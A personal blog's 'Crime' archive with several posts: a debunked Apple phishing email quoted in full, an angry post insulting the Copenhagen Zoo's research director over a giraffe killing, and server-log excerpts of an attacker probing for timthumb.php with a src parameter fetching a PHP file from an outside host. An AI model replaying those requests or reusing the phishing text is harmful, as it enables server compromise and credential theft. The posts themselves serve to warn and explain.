Blog

Category Archives: Crime


The ioscareteam phishing email

Posted by in Apple,Computer Security,Crime,Internet,Privacy | September 19, 2014

I just got this very official-looking mail in my main address:

ioscareteam_email

 

It reads like this:

Dear javi@lavandeira.net, (19 – September – 2014)

This message is to therefore warn you that your iCloud and Apple Account (javi@lavandeira.net) has been temporarily locked until we can validate your Apple Account details. This protective measure to secure your iCloud Account from unapproved usage. We apologise for any inconvenience you’ve been caused.

You will be unable to use iTunes or iCloud sync/backup or the iTunes/App Store & App Store until you verify your Apple Account ownership, we urge you to finish verification as soon as you can. Failure to validate your details within a 48 hours can cause termination of your Apple/iCloud ID to safeguard our system.

How to verify my Apple ID and restore access?
Just proceed to the link underneath to prove ownership of your Apple ID. Log-in in using your Appe/iCloud ID and password, then read the instructions.

> Certify My Apple Account

While using Apple devices and services, you’ll still sign in with your main email address as your Apple ID.

If you have questions and need help, visit the Apple Account Care site.

Thanks again,
Apple Account Maintenance Team

Case Support ID: #Y10FHK10419-EU10

It sounds very scary and serious. Should I click the link and log in with my Apple ID and password?

No.

This is just another phishing attempt. You are likely to receive a similar email. Do not, under any circumstances, click on the link and enter your details. I repeat: it’s just another phishing attempt.

Looking a bit closer we can see that the message’s reply-to header points to an address in the ioscareteam.co.uk domain. This domain doesn’t belong to Apple:

ioscareteam_replyto

 

The link in the body of the message also points to the same domain. Just place the mouse pointer over the link (without clicking) and wait a couple seconds:

ioscareteam_mouseover

They ask for your ‘Appe’ ID :-D

Clicking the link would take you to a very convincing fake Apple site that copies Apple’s real site. Looks like they even copied the country/language selection code.

However, this fake site will send your login details to the idiots who are trying to scam you:

ioscareteam_fakesite

 

Summary: if you get an email like the one I got, ignore it.

Copenhagen zoo kills baby giraffe for fun, murderer still free

Posted by in Animal rights,Crime,Pets,Society | February 11, 2014

Yesterday (February 9th 2014), the Copenhagen Zoo murdered Marius, a 18-month giraffe baby by shooting him in the head. They then proceeded to dismember his corpse in front of the zoo visitors and feed the corpse to the lions.

Marius the giraffe

Social networks and news sites are all echoing this crime. Just a few examples:

There was nothing wrong with Marius. He was a completely healthy animal. However, Bengt Holst, Director of Research and Conservation at Copenhagen Zoo, decided that Marius wasn’t genetically valuable enough. Other zoos offered to adopt Marius, but Holst declined the offers and decided that it would be a better show to kill the baby giraffe and carve the corpse in front of the public.

This is a photo of this fucking son of a bitch (it’s the dude on the left, the elephant is innocent):

bengt_holst_murderer

In my opinion, this bastard, together with all the staff involved in the killing, should be immediately fired, forbidden to ever work with animals again, and put on trial for cruelty against animals. Under his direction, the Copenhagen Zoo sacrifices 20-30 animals per year.

There are several petitions online to get Holst fired or force him to resign. Here are two of them:

You should sign these, but you know how these things work: online petitions will most likely be ignored. Please share this in all your social networks. It may also be effective to write a letter directly to the Copenhagen Zoo and express your feelings about this killing. Here’s the address:

Copenhagen Zoo Administration
Roskildevej 32
2000 Frederiksberg
Denmark

WARNING: what follows are the photos of the killing and dismembering process. There are lots of blood, so don’t read the rest of the post if you’re sensitive to this stuff.

 

Read more ›

Another script kiddy bruteforcing my password

Posted by in Computer Security,Crime,Stupidity | May 2, 2013

Just as I finished the previous post, this pops up in my Varnish log:

script-kiddyA script kiddy using a host in Italy to bruteforce my WordPress password. What a waste of time and bandwidth.

My friend, please try something more sophisticated. I’m sure there are some holes on my system somewhere just waiting to be exploited.

 

One of today’s attacks to this web server

Posted by in Computer Security,Crime,Technology | April 29, 2013

My web server was attacked by some guy in Germany last night. This is happens several times a day, so it’s usually not a concern. Ths time it happened while I was monitoring the server, so I had some fun looking at what the attacker was trying to do.

When I’m working on the computer at home I usually have a terminal window open in the background. In this window I’m usually watching all requests to my web server in real time. Most of time time I don’t pay attention to it (it’s mostly search engines crawling my domains), but sometimes you catch something interesting. This is an example of the kind of attacks hitting every web server on the Internet many times a day.

I was having dinner when I saw several strange requests to the Varnish server in front of my backend web server:

85.214.110.68 - - [28/Apr/2013:22:47:48 +0900] "GET /wp-content/themes/Momento/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 400 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:49 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:50 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:54 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:55 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:56 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:57 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:58 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:59 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:00 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:01 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:07 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:08 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:09 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:10 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:11 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:12 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:18 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:19 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:20 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:21 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:22 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:23 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:25 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
[...additional lines ommited...]

(Actually, these logs are from the backend web server running Apache. I’m not storing the request log on the Varnish machine.)

This guy was obviously scanning the web server for a script called timthumb.php. A quick search on Google shows that there was indeed a security problem with older versions of this program. It was possible to trick it into downloading a file from an attacker’s host and saving it into the server, where it could be later executed in order to compromise the system (see this link for details.)

Read more ›

ag0ny.com domain stolen

Posted by in Computer Security,Crime,Internet,Personal | July 5, 2012

I just realized now that ag0ny.com, the domain name that I had been using for over 12 years, has been stolen. It’s pointing to a site in Russia and is hosting what appears to be a web aggregator.

I’m not really going to pursue this because the domain was worthless. I just had an email address there that I barely used. I kept it because from time to time some old friend or another sent me an email there. Plus, another person had an @ag0ny.com address on my server (JPGrobler: if you read this, now you know why your email address isn’t working anymore, I’m sorry).

So remember, if you want to contact me via email, my current email address is javi@lavandeira.net, not the old ag0ny@ag0ny.com.

ag0ny.com at the Internet Archive Wayback Machine, just for nostalgia.

Crazy woman illegally uses photographer’s photo, then makes legal threats

Posted by in Crime,Fun,Internet,Photography,Politics,Stupidity | June 10, 2012

Imagine that you’re a professional photographer: you earn money by taking photos and licensing them to customers who want to use them. One day while browsing the web you find a web site using one of your commercial photos illegally. You wonder how many people are doing the same, so you run an online search and find out that there are many, many web sites using your photo illegally.

You want these people to stop using your work. You could try and contact each of the web site owners, but you know that it’s going to be pointless because most don’t have contact information, or the contact person doesn’t have access to the web code, or they will just ignore you. You decide to send DMCA takedown notices to the companies hosting each of these web sites, so they will get in touch with their customers and ask them to remove your photo from their web sites.

As a result of the DMCA takedown requests, many of the web sites remove your photo, others offer to license it, as they should have done from the beginning. It seems to be going well.

Until a crazy psychotic person enters the scene.

Read more ›